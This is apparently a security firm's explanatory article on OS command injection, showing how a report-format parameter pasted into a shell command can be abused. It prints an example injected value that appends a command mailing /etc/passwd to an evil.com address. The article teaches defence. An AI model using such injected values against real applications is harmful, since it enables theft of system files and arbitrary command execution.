Command Injection refers to a class of application vulnerabilities in which unvalidated and un-encoded untrusted input is integrated into a command that is then passed to the Operating System (OS) for execution. Command Injection vulnerabilities can be devastating because maliciously crafted inputs can pervert the designer’s intent, and potentially lead to the complete compromise of the underlying platform. Command Injection vulnerabilities appear with applications because programming languages, application development frameworks, and platforms such as databases provide facilities for command-execution by the operating system. These facilities are embraced by application designers who find it a necessary or convenient way to accomplish work in the OS environment.
Command Injection Vulnerability Example
Consider the scenario in which the user is prompted to make certain preference selections about a report to be generated, and that these choices are translated into command line arguments that are then passed to the application as parameters. In other words, strings that will appear in a command-line that will be executed by the OS are passed as inputs to the application. For our example, let’s assume the user chooses to generate the report in tabular format, resulting in a ?format=-T being passed as a query parameter to the application. Let’s further suppose that the application inserts the value of the “format” parameter directly into the command-line as follows:
genReport -T someDestinationFile 2>/var/log/myApp.err
where the application has chosen a file to hold the report and error messages are sent to a log file.
Now consider what happens if a malicious user intercepts the request using a web-proxy and replaces the value of the “format” parameter with the following:
-T; mail evildoer@evil.com < /etc/passwd #
which would result in the following command line:
genReport -T; mail evildoer@evil.com < /etc/passwd # someDestinationFile 2>/var/log/myApp.err
You do not need to be a Linux guru to recognize that the designer’s vision has been corrupted here. The modified command-line is interpretted as follows:
- The semi-colon is a statement terminator, so that is understood to mark the end of the first command: genReport -T
- A second command has been injected into the command-line. Assuming that email service is running, the “mail evildoer@evil.com < /etc/passwd” will cause the list of user accounts on the system to be mailed to the indicated recipient.
- The # marks the beginning of an inline comment, causing the remainder of the command-line to be ignored.
Note that this vulnerability would provide an attacker with the ability to execute arbitrary commands in the OS environment, limited only by the permissions on the OS account being used to support the application.
For insight into how to detect Command Line Injection vulnerabilities, please see the article entitled “How To Test For Command Injection“.
For insight into how to prevent or fix Command Line Injection vulnerabilities, please see the article entitled “How To Prevent Command Injection“.
About Affinity IT Security
We hope you found this article to be useful. Affinity IT Security is available to help you with your security testing and train your developers and testers. In fact, we train developers and IT staff how to hack applications and networks.
Perhaps it was a network scan or website vulnerability test that brought you here. If so, you are likely researching how to find, fix, or avoid a particular vulnerability. We urge you to be proactive and ensure that key individuals in your organization understand not only this issue, but also are more broadly aware of application security.
Contact us to learn how to better protect your enterprise.
Although every effort has been made to provide the most useful and highest quality information, it is unfortunate but inevitable that some errors, omissions, and typographical mistakes will appear in these articles. Consequently, Affinity IT Security will not be responsible for any loss or damages resulting directly or indirectly from any error, misunderstanding, software defect, example, or misuse of any content herein.